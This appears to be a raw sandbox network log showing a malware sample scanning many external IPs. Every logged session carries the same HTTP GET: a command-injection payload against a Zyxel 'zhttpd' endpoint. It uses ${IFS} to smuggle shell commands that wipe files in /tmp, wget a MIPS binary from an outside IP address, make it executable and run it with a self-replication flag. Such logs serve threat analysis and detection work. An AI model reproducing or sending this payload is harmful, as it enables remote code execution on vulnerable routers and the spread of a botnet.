                                    Jan 13, 2024 19:02:48.516716957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8132192.168.2.1360130209.176.200.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516767979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8133192.168.2.1344806195.162.160.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516809940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8134192.168.2.1350092155.230.4.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516844988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8135192.168.2.1355190189.89.143.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516917944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8136192.168.2.1352614128.49.245.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516940117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8137192.168.2.1340970169.172.222.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.517009020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8138192.168.2.1356154129.216.18.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.517038107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8139192.168.2.1339100182.34.2.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.517086029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8140192.168.2.1334774164.191.15.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.517138004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8141192.168.2.1342424134.136.145.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.517174959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8142192.168.2.1343744194.248.155.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.517201900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8143192.168.2.1340666213.76.234.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521291018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8144192.168.2.135668461.117.33.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521354914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8145192.168.2.134813669.15.240.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521410942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8146192.168.2.1350938223.4.182.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521442890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8147192.168.2.1349206112.81.92.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521522999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8148192.168.2.13589208.128.208.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521533966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8149192.168.2.133939888.1.5.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521615982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8150192.168.2.133508017.62.81.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521661043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8151192.168.2.136004042.195.103.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521722078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8152192.168.2.1349826150.168.105.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.521779060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8153192.168.2.1354036131.213.38.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531420946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8154192.168.2.1337318176.108.209.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531518936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8155192.168.2.1349610112.134.15.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531567097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8156192.168.2.1332878185.28.3.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531636000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8157192.168.2.134237478.243.22.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531678915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8158192.168.2.136022038.58.65.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531728983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8159192.168.2.1353938160.25.253.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531779051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8160192.168.2.135019494.232.217.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531829119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8161192.168.2.1333860107.137.76.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531888008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8162192.168.2.1343732152.12.70.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531924009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8163192.168.2.1341902151.9.136.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531966925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8164192.168.2.1353098199.68.169.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.531996012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8165192.168.2.134815036.51.59.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532040119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8166192.168.2.1338022137.232.168.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532108068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8167192.168.2.1353082162.22.218.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532145977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8168192.168.2.13554881.153.179.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532201052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8169192.168.2.1344330109.76.162.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532278061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8170192.168.2.135852289.215.13.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532325983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8171192.168.2.135636273.139.100.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532356977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8172192.168.2.1354044133.93.219.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532392025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8173192.168.2.134745461.40.224.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532449007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8174192.168.2.134914281.84.6.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532504082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8175192.168.2.1346442162.234.185.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532558918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8176192.168.2.1350988206.177.204.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532591105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8177192.168.2.134535494.201.155.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532675982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8178192.168.2.134360857.26.22.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532762051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8179192.168.2.1351120212.15.197.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532812119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8180192.168.2.1347018221.230.250.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532877922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8181192.168.2.134140617.82.214.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532913923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8182192.168.2.1351314165.123.124.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.532989979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8183192.168.2.1342580204.251.181.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533034086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8184192.168.2.136065478.60.44.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533062935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8185192.168.2.1339866169.76.149.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533175945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8186192.168.2.135021853.239.109.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533238888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8187192.168.2.1335278186.241.213.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533265114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8188192.168.2.1358276195.127.130.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533313990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8189192.168.2.135705481.124.114.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533349037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8190192.168.2.1344736114.247.114.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533425093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8191192.168.2.1346678189.50.152.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533472061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8192192.168.2.1336676176.106.131.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533543110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8193192.168.2.1355238112.147.250.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533610106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8194192.168.2.13447721.242.38.168443
                                    TimestampBytes transferredDirectionData
